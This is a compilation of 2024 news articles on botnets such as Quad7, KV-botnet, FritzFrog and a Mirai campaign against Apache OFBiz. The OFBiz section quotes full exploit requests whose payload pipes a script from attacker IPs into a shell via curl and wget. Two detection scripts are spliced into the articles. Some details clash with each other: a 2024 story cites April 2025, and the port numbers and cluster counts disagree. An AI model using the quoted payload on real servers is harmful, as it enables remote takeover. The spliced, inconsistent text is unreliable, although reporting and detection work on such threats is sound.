Quad7 Botnet Expands to Target SOHO Routers and VPN Appliances
13.9.24 
BotNet  The Hacker News
The operators of the mysterious Quad7 botnet are actively evolving by compromising several brands of SOHO routers and VPN appliances by leveraging a combination of both known and unknown security flaws.

Targets include devices from TP-LINK, Zyxel, Asus, Axentra, D-Link, and NETGEAR, according to a new report by French cybersecurity company Sekoia.

"The Quad7 botnet operators appear to be evolving their toolset, introducing a new backdoor and exploring new protocols, with the aim of enhancing stealth and evading the tracking capabilities of their operational relay boxes (ORBs)," researchers Felix Aimé, Pierre-Antoine D., and Charles M. said.

Quad7, also called 7777, was first publicly documented by independent researcher Gi7w0rm in October 2023, highlighting the activity cluster's pattern of ensnaring TP-Link routers and Dahua digital video recorders (DVRs) into a botnet.

The botnet, which gets its name from the fact it opens TCP port 7777 on compromised devices, has been observed brute-forcing Microsoft 365 and Azure instances.

"The botnet also appears to infect other systems like MVPower, Zyxel NAS, and GitLab, although at a very low volume," VulnCheck's Jacob Baines noted earlier this January. "The botnet doesn't just start a service on port 7777. It also spins up a SOCKS5 server on port 11228."

Subsequent analyses by Sekoia and Team Cymru over the past few months have found that the botnet has not only compromised TP-Link routers in Bulgaria, Russia, the U.S., and Ukraine, but has since also expanded to target ASUS routers that have TCP ports 63256 and 63260 opened.


The latest findings show that the botnet is comprised of three additional clusters -

xlogin (aka 7777 botnet) - A botnet composed of compromised TP-Link routers which have both TCP ports 7777 and 11288 opened
alogin (aka 63256 botnet) - A botnet composed of compromised ASUS routers which have both TCP ports 63256 and 63260 opened
rlogin - A botnet composed of compromised Ruckus Wireless devices which have TCP port 63210 opened
axlogin - A botnet capable of targeting Axentra NAS devices (not detected in the wild as yet)
zylogin - A botnet composed of compromised Zyxel VPN appliances that have TCP port 3256 opened

Sekoia told The Hacker News that the countries with the highest number of infections are Bulgaria (1,093), the U.S. (733), and Ukraine (697).

In a further sign of tactical evolution, the threat actors now utilize a new backdoor dubbed UPDTAE that sets up an HTTP-based reverse shell to establish remote control on the infected devices and execute commands sent from a command-and-control (C2) server.

It's currently not clear what the exact purpose of the botnet is or who is behind it, but the company said the activity is likely the work of a Chinese state-sponsored threat actor.

"Regarding the 7777 [botnet], we only saw brute-force attempts against Microsoft 365 accounts," Aimé told the publication. "For the other botnets, we still don't know how they are used."

"However, after exchanges with other researchers and new findings, we are almost certain that the operators are more likely CN state-sponsored rather than simple cybercriminals doing [business email compromise]."

"We are seeing the threat actor attempting to be more stealthy by using new malwares on the compromised edge devices. The main aim behind that move is to prevent tracking of the affiliated botnets."


GeoServer Vulnerability Targeted by Hackers to Deliver Backdoors and Botnet Malware
7.9.24 
BotNet  The Hacker News
A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk.

The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances.

In mid-July, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The Shadowserver Foundation said it detected exploitation attempts against its honeypot sensors starting July 9, 2024.

According to Fortinet FortiGuard Labs, the flaw has been observed to deliver GOREVERSE, a reverse proxy server designed to establish a connection with a command-and-control (C2) server for post-exploitation activity.

These attacks are said to target IT service providers in India, technology companies in the U.S., government entities in Belgium, and telecommunications companies in Thailand and Brazil.

The GeoServer server has also served as a conduit for Condi and a Mirai botnet variant dubbed JenX, and at least four types of cryptocurrency miners, one of which is retrieved from a fake website that impersonates the Institute of Chartered Accountants of India (ICAI).

Perhaps the most notable of the attack chains leveraging the flaw is the one that propagates an advanced Linux backdoor called SideWalk, which is attributed to a Chinese threat actor tracked as APT41.

The starting point is a shell script that's responsible for downloading the ELF binaries for ARM, MIPS, and X86 architectures, which, in turn, extract the C2 server from an encrypted configuration, connect to it, and receive further commands for execution on the compromised device.

This includes running a legitimate tool known as Fast Reverse Proxy (FRP) to evade detection by creating an encrypted tunnel from the host to the attacker-controlled server, allowing for persistent remote access, data exfiltration, and payload deployment.

"The primary targets appear to be distributed across three main regions: South America, Europe, and Asia," security researchers Cara Lin and Vincent Li said.

"This geographical spread suggests a sophisticated and far-reaching attack campaign, potentially exploiting vulnerabilities common to these diverse markets or targeting specific industries prevalent in these areas."

The development comes as CISA this week added to its KEV catalog two flaws found in 2021 in DrayTek VigorConnect (CVE-2021-20123 and CVE-2021-20124, CVSS scores: 7.5) that could be exploited to download arbitrary files from the underlying operating system with root privileges.


Unpatched AVTECH IP Camera Flaw Exploited by Hackers for Botnet Attacks
29.8.24 
BotNet  The Hacker News
A years-old high-severity flaw impacting AVTECH IP cameras has been weaponized by malicious actors as a zero-day to rope them into a botnet.

CVE-2024-7029 (CVSS score: 8.7), the vulnerability in question, is a "command injection vulnerability found in the brightness function of AVTECH closed-circuit television (CCTV) cameras that allows for remote code execution (RCE)," Akamai researchers Kyle Lefton, Larry Cashdollar, and Aline Eliovich said.

Details of the security shortcoming were first made public earlier this month by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), highlighting its low attack complexity and the ability to exploit it remotely.

"Successful exploitation of this vulnerability could allow an attacker to inject and execute commands as the owner of the running process," the agency noted in an alert published August 1, 2024.

It's worth noting that the issue remains unpatched. It impacts AVM1203 camera devices using firmware versions up to and including FullImg-1023-1007-1011-1009. The devices, although discontinued, are still used in the commercial facilities, financial services, healthcare and public health, and transportation systems sectors, per CISA.

Akamai said the attack campaign has been underway since March 2024, although the vulnerability has had a public proof-of-concept (PoC) exploit as far back as February 2019. However, a CVE identifier wasn't issued until this month.

"Malicious actors who operate these botnets have been using new or under-the-radar vulnerabilities to proliferate malware," the web infrastructure company said. "There are many vulnerabilities with public exploits or available PoCs that lack formal CVE assignment, and, in some cases, the devices remain unpatched."

The attack chains are fairly straightforward in that they leverage the AVTECH IP camera flaw, alongside other known vulnerabilities (CVE-2014-8361 and CVE-2017-17215), to spread a Mirai botnet variant on target systems.

"In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus," the researchers said. "Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string 'Corona' to the console on an infected host."

The development comes weeks after cybersecurity firms Sekoia and Team Cymru detailed a "mysterious" botnet named 7777 (or Quad7) that has leveraged compromised TP-Link and ASUS routers to stage password-spraying attacks against Microsoft 365 accounts. As many as 12,783 active bots have been identified as of August 5, 2024.

"This botnet is known in open source for deploying SOCKS5 proxies on compromised devices to relay extremely slow 'brute-force' attacks against Microsoft 365 accounts of many entities around the world," Sekoia researchers said, noting that a majority of the infected routers are located in Bulgaria, Russia, the U.S., and Ukraine.

While the botnet gets its name from the fact it opens TCP port 7777 on compromised devices, a follow-up investigation from Team Cymru has since revealed a possible expansion to include a second set of bots that are composed mainly of ASUS routers and characterized by the open port 63256.

"The Quad7 botnet continues to pose a significant threat, demonstrating both resilience and adaptability, even if its potential is currently unknown or unreached," Team Cymru said. "The linkage between the 7777 and 63256 botnets, while maintaining what appears to be a distinct operational silo, further underscores the evolving tactics of the threat operators behind Quad7."


New Gafgyt Botnet Variant Targets Weak SSH Passwords for GPU Crypto Mining
15.8.24 
BotNet  The Hacker News
Cybersecurity researchers have discovered a new variant of the Gafgyt botnet that's targeting machines with weak SSH passwords to ultimately mine cryptocurrency on compromised instances using their GPU computational power.

This indicates that the "IoT botnet is targeting more robust servers running on cloud native environments," Aqua Security researcher Assaf Morag said in a Wednesday analysis.

Gafgyt (aka BASHLITE, Lizkebab, and Torlus), known to be active in the wild since 2014, has a history of exploiting weak or default credentials to gain control of devices such as routers, cameras, and digital video recorders (DVRs). It's also capable of leveraging known security flaws in Dasan, Huawei, Realtek, SonicWall, and Zyxel devices.

The infected devices are corralled into a botnet capable of launching distributed denial-of-service (DDoS) attacks against targets of interest. There is evidence to suggest that Gafgyt and Necro are operated by a threat group called Keksec, which is also tracked as Kek Security and FreakOut.

IoT botnets like Gafgyt are constantly evolving to add new features, with variants detected in 2021 using the TOR network to cloak the malicious activity, as well as borrowing some modules from the leaked Mirai source code. It's worth noting that Gafgyt's source code was leaked online in early 2015, further fueling the emergence of new versions and adaptations.


The latest attack chains involve brute-forcing SSH servers with weak passwords to deploy next-stage payloads to facilitate a cryptocurrency mining attack using "systemd-net," but not before terminating competing malware already running on the compromised host.

It also executes a worming module, a Go-based SSH scanner named ld-musl-x86, that's responsible for scanning the internet for poorly secured servers and propagating the malware to other systems, effectively expanding the scale of the botnet. This comprises SSH, Telnet, and credentials related to game servers and cloud environments like AWS, Azure, and Hadoop.

"The cryptominer in use is XMRig, a Monero cryptocurrency miner," Morag said. "However, in this case, the threat actor is seeking to run a cryptominer using the --opencl and --cuda flags, which leverage GPU and Nvidia GPU computational power."

"This, combined with the fact that the threat actor's primary impact is crypto-mining rather than DDoS attacks, supports our claim that this variant differs from previous ones. It is aimed at targeting cloud-native environments with strong CPU and GPU capabilities."

Data gathered by querying Shodan shows that there are over 30 million publicly accessible SSH servers, making it essential that users take steps to secure the instances against brute-force attacks and potential exploitation.


Mirai Botnet targeting OFBiz Servers Vulnerable to Directory Traversal
2.8.24 
BotNet  The Hacker News
Enterprise Resource Planning (ERP) software is at the heart of many enterprises, supporting human resources, accounting, shipping, and manufacturing. These systems can become very complex and difficult to maintain. They are often highly customized, which can make patching difficult. However, critical vulnerabilities keep affecting these systems and put critical business data at risk.

The SANS Internet Storm Center published a report showing how the open-source ERP framework OFBiz is currently the target of new varieties of the Mirai botnet.

As part of its extensive project portfolio, the Apache Foundation supports OFBiz, a Java-based framework for creating ERP (Enterprise Resource Planning) applications. OFBiz appears to be far less prevalent than commercial alternatives. However, just as with any other ERP system, organizations rely on it for sensitive business data, and the security of these ERP systems is critical.

In May this year, a critical security update was released for OFBiz. The update fixed a directory traversal vulnerability that could lead to remote command execution. OFBiz versions before 18.12.13 were affected. A few weeks later, details about the vulnerability were made public.

Directory traversal, or path traversal, vulnerabilities can be used to bypass access control rules. For example, if a user can access a "/public" directory but not a "/admin" directory, an attacker may use a URL like "/public/../admin" to fool the access control logic. Recently, CISA and FBI released an alert as part of the "Secure by Design" initiative, focusing on directory traversal. CISA pointed out that they are currently tracking 55 directory traversal vulnerabilities as part of the "Known Exploited Vulnerabilities" (KEV) catalog.

For OFBiz, the directory traversal is easily triggered by inserting a semicolon. All an attacker has to find is a URL they can access and append a semicolon followed by a restricted URL. The exploit URL we currently see is:

/webtools/control/forgotPassword;/ProgramExport

Because users must be able to reset passwords without first logging in, "forgotPassword" does not require any authentication. "ProgramExport," on the other hand, should be access-controlled and not reachable unless the user is logged in. "ProgramExport" is particularly dangerous in that it allows arbitrary code execution. Faulty logic in OFBiz stopped evaluating the URL at the semicolon. This allowed any user, without logging in, to access the second part of the URL, "/ProgramExport."

An attacker must use a POST request to exploit the vulnerability but does not necessarily need a request body. Instead, a URL parameter will work just fine.
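A defender's view of the semicolon pattern described above, as an added example that is not part of the original article or of OFBiz: a Python scan of web access logs for requests whose path carries a further path segment after a ";". The Combined Log Format layout and the PROTECTED endpoint set are assumptions, and the sample log lines are constructed (documentation IP ranges, placeholder parameter value).

```python
import re
from collections import namedtuple
from urllib.parse import urlsplit, unquote, parse_qs

# Assumption: endpoints that must only be reachable after login.
# "ProgramExport" is the one named in the article.
PROTECTED = {"ProgramExport"}

# Assumption: access logs are in Combined Log Format.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

Finding = namedtuple("Finding", "src method path severity reasons")

# Constructed sample lines, not taken from any real log.
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Jul/2024:10:01:02 +0000] "POST /webtools/control/'
    'forgotPassword;/ProgramExport?groovyProgram=PLACEHOLDER HTTP/1.1" 200 512',
    '198.51.100.8 - - [28/Jul/2024:10:01:09 +0000] "POST /webtools/control/'
    'forgotPassword%3B/ProgramExport HTTP/1.1" 200 498',
    '192.0.2.10 - - [28/Jul/2024:10:02:00 +0000] "GET /webtools/control/'
    'main;jsessionid=ABC123.jvm1 HTTP/1.1" 200 2048',
    '192.0.2.11 - - [28/Jul/2024:10:02:30 +0000] "POST /webtools/control/'
    'forgotPassword HTTP/1.1" 200 1024',
    '203.0.113.5 - - [28/Jul/2024:10:03:00 +0000] "GET /webtools/control/'
    'forgotPassword;/ProgramExport HTTP/1.1" 200 300',
]


def decode_path(raw, rounds=3):
    """Percent-decode repeatedly so %3B and %253B are both seen as ';'."""
    for _ in range(rounds):
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw


def last_segment(path):
    """Last non-empty path segment, without any ';param' suffix."""
    parts = [p for p in path.split("/") if p]
    return parts[-1].split(";", 1)[0] if parts else ""


def inspect(line):
    """Return a Finding for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable line: nothing to judge
    target = urlsplit(m["target"])
    path = decode_path(target.path)
    reasons, bypass = [], False

    if ";" in path:
        before, after = path.split(";", 1)
        # ';jsessionid=...' style parameters carry no further path segment
        # and are left alone; a '/' after the ';' is what matters here.
        if "/" in after:
            checked = last_segment(before)   # what a check stopping at ';' sees
            reached = last_segment(after)    # what is named after the ';'
            if reached in PROTECTED and checked not in PROTECTED:
                bypass = True
                reasons.append(f"'{checked}' checked, '{reached}' reached")
            else:
                reasons.append("path segment after ';'")

    # The article shows the command passed in a 'groovyProgram' parameter.
    if "groovyProgram" in parse_qs(target.query, keep_blank_values=True):
        reasons.append("groovyProgram in query string")

    if not reasons:
        return None
    # The article notes that exploitation requires POST; other methods
    # with the same path shape are kept as lower-severity probes.
    severity = "high" if bypass and m["method"] == "POST" else "medium"
    return Finding(m["src"], m["method"], path, severity, reasons)


def scan(lines):
    """Inspect every line and keep only the findings."""
    return [f for f in map(inspect, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding.severity, finding.src, finding.method,
              finding.path, "; ".join(finding.reasons))
```

A request body is not recorded in a standard access log, so the body-based flavor is caught here only through its path.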

The SANS Internet Storm Center uses an extensive network of honeypots to detect attempts to exploit a wide range of web application vulnerabilities. Significant new exploit attempts are summarized in a "First Seen" report. This weekend, these sensors detected a significant increase in attempts to exploit CVE-2024-32213, the OFBiz directory traversal vulnerability mentioned above, which was immediately picked up by the "First Seen" report.

The exploit attempts originated from two different IP addresses that were also associated with various attempts to exploit IoT devices, commonly associated with current varieties of the "Mirai" botnet.

The miscreants used two flavors of the exploit. The first one used the URL to include the command the exploit was intended to execute:

POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh

The second one used the body of the request for the command, which is more common for "POST" requests:

POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: [victim IP address]
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);

Sadly, neither the "bin.sh" nor the "sh" script was recovered. The IP addresses were involved in scans on July 29th, using the user agent "KrebsOnSecurity," a tip of the hat to infosec blogger Brian Krebs. However, the URLs scanned were mostly parasitic, looking for existing web shells left behind by prior attacks. The IP address was also used to distribute a file called "botx.arm". This filename is often associated with Mirai variants.

With the vulnerability announcement in May, we have been waiting for some scans to take advantage of the OFBiz vulnerability. Exploitation was trivial, and while the vulnerable and exposed population is small, this hasn't stopped attackers in the past. But they are now at least experimenting and maybe adding the vulnerability to bots like Mirai variants.

There are only a few IPs involved:

95.214.27.196: Sending exploit as URL parameter and hosting malware.
83.222.191.62: Sending exploit as request body. Malware hosted on 185.196.10.231. Earlier in July, this IP scanned for IoT vulnerabilities.
185.196.10.231: hosting malware


New Golang-Based Zergeca Botnet Capable of Powerful DDoS Attacks
5.7.24 
BotNet  The Hacker News
Cybersecurity researchers have uncovered a new botnet called Zergeca that's capable of conducting distributed denial-of-service (DDoS) attacks.

Written in Golang, the botnet is so named for its reference to a string named "ootheca" present in the command-and-control (C2) servers ("ootheca[.]pw" and "ootheca[.]top").

"Functionally, Zergeca is not just a typical DDoS botnet; besides supporting six different attack methods, it also has capabilities for proxying, scanning, self-upgrading, persistence, file transfer, reverse shell, and collecting sensitive device information," the QiAnXin XLab team said in a report. Zergeca is also notable for using DNS-over-HTTPS (DoH) to perform Domain Name System (DNS) resolution of the C2 server and using a lesser-known library known as Smux for C2 communications.

There is evidence to suggest that the malware's authors are actively developing and updating it to support new commands. What's more, the C2 IP address 84.54.51[.]82 is said to have been previously used to distribute the Mirai botnet around September 2023.

As of April 29, 2025, the same IP address began to be used as a C2 server for the new botnet, raising the possibility that the threat actors "accumulated experience operating the Mirai botnets before creating Zergeca."

Attacks mounted by the botnet, primarily ACK flood DDoS attacks, have targeted Canada, Germany, and the U.S. between early and mid-June 2024.

Zergeca's features span four distinct modules – namely persistence, proxy, silivaccine, and zombie – which set up persistence by adding a system service, implement proxying, remove competing miner and backdoor malware and gain exclusive control over devices running the x86-64 CPU architecture, and handle the main botnet functionality.

The zombie module is responsible for reporting sensitive information from the compromised device to the C2 and awaiting commands from the server, supporting six types of DDoS attacks, scanning, reverse shell, and other functions.

"The built-in competitor list shows familiarity with common Linux threats," XLab said. "Techniques like modified UPX packing, XOR encryption for sensitive strings, and using DoH to hide C2 resolution demonstrate a strong understanding of evasion tactics."


10-Year-Old 'RUBYCARP' Romanian Hacker Group Surfaces with Botnet
9.4.24  BotNet  The Hacker News

A threat group of suspected Romanian origin called RUBYCARP has been observed maintaining a long-running botnet for carrying out crypto mining, distributed denial-of-service (DDoS), and phishing attacks.

The group, believed to be active for at least 10 years, employs the botnet for financial gain, Sysdig said in a report shared with The Hacker News.

"Its primary method of operation leverages a botnet deployed using a variety of public exploits and brute-force attacks," the cloud security firm said. "This group communicates via public and private IRC networks."

Evidence gathered so far suggests that RUBYCARP may have crossover with another threat cluster tracked by Albanian cybersecurity firm Alphatechs under the moniker Outlaw, which has a history of conducting crypto mining and brute-force attacks and has since pivoted to phishing and spear-phishing campaigns to cast a wide net.

"These phishing emails often lure victims into revealing sensitive information, such as login credentials or financial details," security researcher Brenton Isufi said in a report published in late December 2023.

A notable aspect of RUBYCARP's tradecraft is the use of a malware called ShellBot (aka PerlBot) to breach target environments. It has also been observed exploiting security flaws in the Laravel Framework (e.g., CVE-2021-3129), a technique also adopted by other threat actors like AndroxGh0st.


In a sign that the attackers are expanding their arsenal of initial access methods to expand the scale of the botnet, Sysdig said it discovered signs of WordPress sites being compromised using commonly used usernames and passwords.

"Once access is obtained, a backdoor is installed based on the popular Perl ShellBot," the company said. "The victim's server is then connected to an [Internet Relay Chat] server acting as command-and-control, and joins the larger botnet."

The botnet is estimated to comprise over 600 hosts, with the IRC server ("chat.juicessh[.]pro") created on May 1, 2023. It heavily relies on IRC for general communications as well as for managing its botnets and coordinating crypto mining campaigns.

Furthermore, members of the group – named juice_, Eugen, Catalin, MUIE, and Smecher, among others – have been found to communicate via an Undernet IRC channel called #cristi. Also put to use is a mass scanner tool to find new potential hosts.

RUBYCARP's arrival on the cyber threat scene is not surprising given their ability to take advantage of the botnet to fuel diverse illicit income streams such as crypto mining and phishing operations to steal credit card numbers.

While it appears that the stolen credit card data is used to purchase attack infrastructure, there is also the possibility that the information could be monetized through other means by selling it in the cyber crime underground.

"These threat actors are also involved in the development and sale of cyber weapons, which isn't very common," Sysdig said. "They have a large arsenal of tools they have built up over the years, which gives them quite a range of flexibility when conducting their operations."


TheMoon Botnet Resurfaces, Exploiting EoL Devices to Power Criminal Proxy
30.3.24  BotNet  The Hacker News
A botnet previously considered to be rendered inert has been observed enslaving end-of-life (EoL) small home/small office (SOHO) routers and IoT devices to fuel a criminal proxy service called Faceless.

"TheMoon, which emerged in 2014, has been operating quietly while growing to over 40,000 bots from 88 countries in January and February of 2024," the Black Lotus Labs team at Lumen Technologies said.

Faceless, detailed by security journalist Brian Krebs in April 2023, is a malicious residential proxy service that's offered its anonymity services to other threat actors for a negligible fee that costs less than a dollar per day.

In doing so, it allows the customers to route their malicious traffic through tens of thousands of compromised systems advertised on the service, effectively concealing their true origins.

The Faceless-backed infrastructure has been assessed to be used by operators of malware such as SolarMarker and IcedID to connect to their command-and-control (C2) servers to obfuscate their IP addresses.

That being said, a majority of the bots are used for password spraying and/or data exfiltration, primarily targeting the financial sector, with more than 80% of the infected hosts located in the U.S.

Lumen said it first observed the malicious activity in late 2023, the goal being to breach EoL SOHO routers and IoT devices and deploy an updated version of TheMoon, and ultimately enroll the botnet into Faceless.


The attacks entail dropping a loader that's responsible for fetching an ELF executable from a C2 server. This includes a worm module that spreads itself to other vulnerable servers and another file called ".sox" that's used to proxy traffic from the bot to the internet on behalf of a user.

In addition, the malware configures iptables rules to drop incoming TCP traffic on ports 8080 and 80 and allow traffic from three different IP ranges. It also attempts to contact an NTP server from a list of legitimate NTP servers in a likely effort to determine if the infected device has internet connectivity and is not being run in a sandbox.

The targeting of EoL appliances to fabricate the botnet is no coincidence, as they are no longer supported by the manufacturer and become susceptible to security vulnerabilities over time. It's also possible that the devices are infiltrated by means of brute-force attacks.

Additional analysis of the proxy network has revealed that more than 30% of the infections lasted for over 50 days, while about 15% of the devices were part of the network for 48 hours or less.

"Faceless has become a formidable proxy service that rose from the ashes of the 'iSocks' anonymity service and has become an integral tool for cyber criminals in obfuscating their activity," the company said. "TheMoon is the primary, if not the only, supplier of bots to the Faceless proxy service."


After FBI Takedown, KV-Botnet Operators Shift Tactics in Attempt to Bounce Back
8.2.24  BotNet  The Hacker News
The threat actors behind the KV-botnet made "behavioral changes" to the malicious network as U.S. law enforcement began issuing commands to neutralize the activity.

KV-botnet is the name given to a network of compromised small office and home office (SOHO) routers and firewall devices across the world, with one specific cluster acting as a covert data transfer system for other Chinese state-sponsored actors, including Volt Typhoon (aka Bronze Silhouette, Insidious Taurus, or Vanguard Panda).

Active since at least February 2022, it was first documented by the Black Lotus Labs team at Lumen Technologies in mid-December 2023. The botnet is known to comprise two main sub-groups, viz. KV and JDY, with the latter principally used for scanning potential targets for reconnaissance.

Late last month, the U.S. government announced a court-authorized disruption effort to take down the KV cluster, which is typically reserved for manual operations against high-profile targets chosen after broader scanning via the JDY sub-group.

Now, according to new findings from the cybersecurity firm, the JDY cluster fell silent for roughly fifteen days following public disclosure and as a byproduct of the U.S. Federal Bureau of Investigation (FBI) undertaking.

"In mid-December 2023, we observed this activity cluster hovering around 1,500 active bots," security researcher Ryan English said. "When we sampled the size of this cluster in mid-January 2024 its size dwindled to approximately 650 bots."

Given that the takedown actions began with a signed warrant issued on December 6, 2023, it's fair to assume that the FBI began transmitting commands to routers located in the U.S. sometime on or after that date to wipe the botnet payload and prevent them from being re-infected.

"We observed the KV-botnet operators begin to restructure, committing eight straight hours of activity on December 8, 2023, nearly ten hours of operations the following day on December 9, 2023, followed by one hour on December 11, 2023," Lumen said in a technical report shared with The Hacker News.

During this four-day period, the threat actor was spotted interacting with 3,045 unique IP addresses that were associated with NETGEAR ProSAFEs (2,158), Cisco RV320/325 (310), Axis IP cameras (29), DrayTek Vigor routers (17), and other unidentified devices (531).

Also observed in early December 2023 was a massive spike in exploitation attempts from the payload server, indicating the adversary's likely attempts to re-exploit the devices as they detected their infrastructure going offline. Lumen said it also took steps to null-route another set of backup servers that became operational around the same time.

It's worth noting that the operators of the KV-botnet are known to perform their own reconnaissance and targeting while also supporting multiple groups like Volt Typhoon. Interestingly, the timestamps associated with exploitation of the bots correlate with China working hours.

"Our telemetry indicates that there were administrative connections into the known payload servers from IP addresses associated with China Telecom," Danny Adamitis, principal information security engineer at Black Lotus Labs, told The Hacker News.


What's more, the press statement from the U.S. Justice Department described the botnet as controlled by "People's Republic of China (PRC) state-sponsored hackers."

This raises the possibility that the botnet "was created by an organization supporting the Volt Typhoon hackers; whereas if the botnet was created by Volt Typhoon, we suspect they would have said 'nation-state' actors," Adamitis added.

There are also signs that the threat actors established a third related-but-distinct botnet cluster dubbed x.sh as early as January 2023 that's composed of infected Cisco routers by deploying a web shell named "fys.sh," as highlighted by SecurityScorecard last month.

But with KV-botnet being just "one form of infrastructure used by Volt Typhoon to obfuscate their activity," it's expected that the recent wave of actions will prompt the advanced persistent threat (APT) actors to presumably transition to another covert network in order to meet their strategic goals.

"A significant percent of all networking equipment in use around the world is functioning perfectly well, but is no longer supported," English said. "End users have a difficult financial choice when a device reaches that point, and many aren't even aware that a router or firewall is at the end of its supported life.

"Advanced threat actors are well aware that this represents fertile ground for exploitation. Replacing unsupported devices is always the best choice, but not always feasible."

"Mitigation involves defenders adding their edge devices to the long list of those they already have to patch and update as often as available, rebooting devices and configuring EDR or SASE solutions where applicable, and keeping an eye on large data transfers out of the network. Geofencing is not a defense to rely on, when the threat actor can hop from a nearby point."


FritzFrog Returns with Log4Shell and PwnKit, Spreading Malware Inside Your Network
2.2.24  BotNet  The Hacker News
The threat actor behind a peer-to-peer (P2P) botnet known as FritzFrog has made a return with a new variant that leverages the Log4Shell vulnerability to propagate internally within an already compromised network.

"The vulnerability is exploited in a brute-force manner that attempts to target as many vulnerable Java applications as possible," web infrastructure and security company Akamai said in a report shared with The Hacker News.

FritzFrog, first documented by Guardicore (now part of Akamai) in August 2020, is a Golang-based malware that primarily targets internet-facing servers with weak SSH credentials. It's known to have been active since January 2020.

It has since evolved to strike the healthcare, education, and government sectors, and has improved its capabilities to ultimately deploy cryptocurrency miners on infected hosts.

What's novel about the latest version is the use of the Log4Shell vulnerability as a secondary infection vector to specifically single out internal hosts rather than targeting vulnerable publicly-accessible assets.

"When the vulnerability was first discovered, internet-facing applications were prioritized for patching because of their significant risk of compromise," security researcher Ori David said.

"Contrastly, internal machines, which were less likely to be exploited, were often neglected and remained unpatched — a circumstance that FritzFrog takes advantage of."


This means that even if the internet-facing applications have been patched, a breach of any other endpoint can expose unpatched internal systems to exploitation and propagate the malware.

The SSH brute-force component of FritzFrog has also received a facelift of its own to identify specific SSH targets by enumerating several system logs on each of its victims.

Another notable change in the malware is the use of the PwnKit flaw, tracked as CVE-2021-4034, to achieve local privilege escalation.

"FritzFrog continues to employ tactics to remain hidden and avoid detection," David said. "In particular, it takes special care to avoid dropping files to disk when possible."

This is accomplished by means of the shared memory location /dev/shm, which has also been put to use by other Linux-based malware such as BPFDoor and Commando Cat, and memfd_create to execute memory-resident payloads.
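A defensive check for the file-avoidance technique described above, as an added example that is not from the Akamai report or the article: on Linux, the `/proc/<pid>/exe` link of a process started from a `memfd_create()` file reads `/memfd:<name> (deleted)`, and one started from shared memory points under `/dev/shm/`. The function names and the `proc_root` parameter are this example's own.

```python
import os
import re

# /proc/<pid>/exe link targets that indicate a process image with no normal
# on-disk file: memfd_create() images read "/memfd:<name> (deleted)".
INDICATORS = (
    ("memfd", re.compile(r"^/memfd:")),
    ("dev_shm", re.compile(r"^/dev/shm/")),
    # Also true after a legitimate package upgrade, so treat as lower confidence.
    ("deleted", re.compile(r" \(deleted\)$")),
)


def classify_exe(target):
    """Return the indicator names that match one exe link target."""
    return [name for name, rx in INDICATORS if rx.search(target)]


def scan_proc(proc_root="/proc"):
    """Return (pid, target, reasons) for each process with a flagged image."""
    hits = []
    for entry in sorted(os.listdir(proc_root)):
        if not entry.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue  # kernel thread, exited process, or not enough privilege
        reasons = classify_exe(target)
        if reasons:
            hits.append((int(entry), target, reasons))
    return hits


if __name__ == "__main__":
    for pid, target, reasons in scan_proc():
        print(f"pid={pid} exe={target!r} indicators={','.join(reasons)}")
```

Run it as root so the links of other users' processes are readable; a hit on `deleted` alone usually means a binary was replaced by an update while still running.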

The disclosure comes as Akamai revealed that the InfectedSlurs botnet is actively exploiting now-patched security flaws (from CVE-2024-22768 through CVE-2024-22772, and CVE-2024-23842) impacting multiple DVR device models from Hitron Systems to launch distributed denial-of-service (DDoS) attacks.


U.S. Feds Shut Down China-Linked "KV-Botnet" Targeting SOHO Routers
2.2.24  BotNet  The Hacker News
The U.S. government on Wednesday said it took steps to neutralize a botnet comprising hundreds of U.S.-based small office and home office (SOHO) routers hijacked by a China-linked state-sponsored threat actor called Volt Typhoon and blunt the impact posed by the hacking campaign.

The existence of the botnet, dubbed KV-botnet, was first disclosed by the Black Lotus Labs team at Lumen Technologies in mid-December 2023. The law enforcement effort was reported by Reuters earlier this week.

"The vast majority of routers that comprised the KV-botnet were Cisco and NetGear routers that were vulnerable because they had reached 'end of life' status; that is, they were no longer supported through their manufacturer's security patches or other software updates," the Department of Justice (DoJ) said in a press statement.

Volt Typhoon (aka DEV-0391, Bronze Silhouette, Insidious Taurus, or Vanguard Panda) is the moniker assigned to a China-based adversarial collective to which cyber attacks targeting critical infrastructure sectors in the U.S. and Guam have been attributed.

"Chinese cyber actors, including a group known as 'Volt Typhoon,' are burrowing deep into our critical infrastructure to be ready to launch destructive cyber attacks in the event of a major crisis or conflict with the United States," CISA Director Jen Easterly noted.

The cyber espionage group, believed to be active since 2021, is known for its reliance on legitimate tools and living-off-the-land (LotL) techniques to fly under the radar and persist within victim environments for extended periods of time to gather sensitive information.

Another important aspect of its modus operandi is that it tries to blend into normal network activity by routing traffic through compromised SOHO network equipment, including routers, firewalls, and VPN hardware, in an attempt to obfuscate its origins.

